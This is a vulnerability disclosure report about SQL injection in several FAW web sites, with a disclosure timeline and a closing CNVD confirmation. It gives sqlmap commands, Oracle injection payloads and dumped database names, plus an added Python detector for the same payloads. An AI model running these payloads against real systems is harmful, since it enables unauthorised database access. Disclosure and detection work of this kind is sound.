2015-11-05: Details sent to the vendor, awaiting the vendor's response
2015-11-09: Vendor confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and relevant domain experts
2015-11-29: Details disclosed to ordinary white hats
2015-12-09: Details disclosed to intern white hats
2015-12-24: Details disclosed to the public
Multiple FAW sites: SQL injection (bundled report)
0x00 http://**.**.**.** login form
sqlmap -u "http://**.**.**.**/ascm/index.jsp" --data "User=aaa&Password=sssssssssss&imageField.x=24&imageField.y=13"
Parameter: User (POST)
    Type: stacked queries
    Title: Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)
    Payload: User=aaa');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(86)||CHR(76)||CHR(108),5) FROM DUAL--&Password=sssssssssss&imageField.x=24&imageField.y=13
the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
current user: 'BIS4'
available databases [1]:
[*] BIS4
0x01 http://**.**.**.** password reset function
sqlmap -u "http://**.**.**.**/QMDRP/ResetPassword" --data "j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss&current_client=800&isDrp=true"
Parameter: current_client (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss&current_client=800' AND 3938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(82)||CHR(74)||CHR(80),5) AND 'FxEl'='FxEl&isDrp=true
Current database
[14 tables]
+-----------------------+
| COURSE                |
| FOUNDTHUMBS           |
| LINEITEM              |
| ROLE                  |
| BINN_CT_TEMPL_ELEMS   |
| CDB_BUDDYS            |
| CONNEXION             |
| ETUDIANTS             |
| MULTASTRATEGY         |
| NUKE_BBFORUM_PRUNE    |
| NUKE_GALLERY_COMMENTS |
| OC                    |
| SAMEDICINO_GE         |
| SETTING               |
+-----------------------+
0x02 **.**.**.**:9010: adding a single quote at the login form shows that input is protected there,
but the forgot-password function was overlooked: **.**.**.**:9010/NFoundation/SYS/UpdatePassWord.aspx? returns a database error
sqlmap -u "**.**.**.**:9010/SYSMainSF/Login" --data "UserCode=aa&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True" --dbs
Parameter: UserCode (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: UserCode=aa') AND 2628=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2628=2628) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)) AND ('KRCq'='KRCq&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: UserCode=aa') AND 4665=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('kDPD'='kDPD&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True
the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
The injection point runs with DBA privileges:
current user: 'TDSV2_JF'
available databases [15]:
[*] APPQOSSYS
[*] DBSNMP
[*] DSG
[*] JFSCM_TDS2SCM_WMS
[*] JINSHUI
[*] OUTLN
[*] SQLTXPLAIN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TDS2DMS
[*] TDS_P2P
[*] TDSV2_JF
[*] WMSYS
[*] XDB
As above.
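The three Oracle injection techniques sqlmap reported above (DBMS_PIPE.RECEIVE_MESSAGE delays, UTL_INADDR.GET_HOST_ADDRESS error-based extraction, and the ALL_USERS self-join heavy query) leave distinctive signatures that the site's operations staff can look for in request logs. The following Python is an added example, not part of the original report: it decodes constructed POST-body log lines (built from the payloads quoted above; the log format is an assumption) and reports which technique each one matches.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the Oracle injection techniques seen in the report above.
# Each entry is (label, regex) matched against a URL-decoded request body.
SIGNATURES = [
    ("stacked/time-based via DBMS_PIPE",
     re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I)),
    ("error-based via UTL_INADDR",
     re.compile(r"UTL_INADDR\s*\.\s*GET_HOST_ADDRESS\s*\(", re.I)),
    ("heavy-query time-based (ALL_USERS self-join)",
     re.compile(r"FROM\s+(ALL_USERS\s+\w+\s*,\s*){2,}ALL_USERS", re.I)),
    # CHR(n)||CHR(n)||... chains are used to build strings without quotes.
    ("CHR() concatenation chain",
     re.compile(r"(CHR\s*\(\s*\d+\s*\)\s*\|\|\s*){2,}CHR\s*\(", re.I)),
]

def classify_body(body: str) -> list:
    """Return the labels of every signature found in one POST body."""
    decoded = unquote_plus(body)  # undo form/URL encoding before matching
    return [label for label, rx in SIGNATURES if rx.search(decoded)]

def scan_log(lines):
    """Yield (line_no, path, labels) for every log line that hits a signature."""
    for n, line in enumerate(lines, 1):
        # Assumed log format: "<request path> <raw POST body>", space separated.
        path, _, body = line.partition(" ")
        labels = classify_body(body)
        if labels:
            yield n, path, labels

# Constructed sample log lines built from the payloads quoted in the report.
SAMPLE_LOG = [
    "/ascm/index.jsp User=aaa&Password=sssssssssss",
    "/ascm/index.jsp User=aaa%27%29%3BSELECT+DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2886%29%7C%7CCHR%2886%29%7C%7CCHR%2876%29%7C%7CCHR%28108%29%2C5%29+FROM+DUAL--&Password=s",
    "/QMDRP/ResetPassword j_username=aa&current_client=800' AND 3938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(82)||CHR(74)||CHR(80),5) AND 'FxEl'='FxEl",
    "/SYSMainSF/Login UserCode=aa') AND 2628=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(122)||(SELECT 1 FROM DUAL)) AND ('KRCq'='KRCq&PassWord=ss",
    "/SYSMainSF/Login UserCode=aa') AND 4665=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('kDPD'='kDPD",
]

if __name__ == "__main__":
    for n, path, labels in scan_log(SAMPLE_LOG):
        print(f"line {n}: {path}: {', '.join(labels)}")
```

Matching on the decoded body matters: the second sample line carries the same DBMS_PIPE payload as the third, only form-encoded, and a filter that checks the raw bytes would miss it.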
Submit to the site operations staff for handling.
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-11-09 11:07
CNVD confirmed and reproduced the reported vulnerability; it has been forwarded by CNCERT to the Jilin sub-centre, which will coordinate remediation with the organisation that administers the sites.
None yet.